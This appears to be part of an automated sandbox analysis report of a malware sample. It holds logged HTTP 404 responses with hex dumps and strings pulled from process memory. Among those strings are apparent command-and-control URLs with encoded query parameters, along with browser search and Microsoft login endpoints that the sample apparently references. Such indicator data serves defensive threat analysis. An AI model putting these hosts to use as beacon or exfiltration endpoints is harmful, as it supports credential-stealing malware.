                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 21:30:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dh%2FLLeiWyqnwiwhMqg2EZhXKg6%2FvFULYOiGs1VUd50GVPAv4lsyEucXKF5CYmiCGy%2BT%2BvsD8ejL%2FF%2FrAITBQwzwTV9L8fMhx9ioCBfN5%2BeeOU3d3bJnmTjRhrEBiNxaGwu%2F8Sg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd31993ce41899-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1541&min_rtt=1541&rtt_var=770&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 21:30:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kNOtAtxtX9U9LZgNguadicEjYe9YsIyDVb4i319XUd4xr9LPqiw3i95Ze%2FlRXhHsiM7Bpf3tflaKOjYnl%2F4tqtugaP6wB%2B%2BoyNctdH5H%2B4motTQiSYe7bMEk%2FyEg9sd4sPnhSQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd31a90fdd8ce0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1801&rtt_var=900&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=900&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 21:30:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mwg8VnPMlIVpQX19Vfm3iuvxhwkhYeki2jf6CEwy0DBErKgQuPngFJ5%2F72az9GfgDc5Uy9aKzaRvmmttR4u1iiKeBE089WW2JUeW%2BHpifnsYoPouBzpkRUMAJcHCluFX6%2BHVHQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd31b91e490fa8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1438&min_rtt=1438&rtt_var=719&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=450&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 62 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a paddin
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 21:30:59 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 21:31:21 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 21:31:24 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 07 Mar 2025 21:32:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d 3a ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 07 Mar 2025 21:32:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d 3a ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 07 Mar 2025 21:32:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d 3a ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: sfc.exe, 00000003.00000002.3334519746.00000000054CE000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000049EE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://dodowo.shop/8g01/?UPV=FK1b7Kdc3jRmrp0nRRghznJ6ST0Z7T8
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3335578138.000000000563A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.comebackhome.online
                Source: 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3335578138.000000000563A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.comebackhome.online/dv29/
                Source: sfc.exe, 00000003.00000003.1355808324.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: sfc.exe, 00000003.00000003.1355808324.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sfc.exe, 00000003.00000003.1355808324.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sfc.exe, 00000003.00000003.1355808324.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sfc.exe, 00000003.00000003.1355808324.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sfc.exe, 00000003.00000003.1355808324.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: sfc.exe, 00000003.00000003.1355808324.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sfc.exe, 00000003.00000003.1355808324.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: sfc.exe, 00000003.00000002.3332463262.0000000002F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sfc.exe, 00000003.00000002.3332463262.0000000002F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sfc.exe, 00000003.00000003.1349005823.0000000008093000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: sfc.exe, 00000003.00000002.3332463262.0000000002F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: sfc.exe, 00000003.00000002.3332463262.0000000002F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: sfc.exe, 00000003.00000002.3332463262.0000000002F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: sfc.exe, 00000003.00000002.3332463262.0000000002F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: sfc.exe, 00000003.00000002.3336452699.0000000006670000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3334519746.00000000051AA000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.00000000046CA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: sfc.exe, 00000003.00000002.3334519746.0000000005660000.00000004.10000000.00040000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000002.3333782638.0000000004B80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.16544.pizza/q6tn/?UPV=a9XpPJI/g468snPop4XAPz9RbNk6OpQm8pbKtEIG/rWptSKHGLi8G
                Source: sfc.exe, 00000003.00000003.1355808324.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20Y&
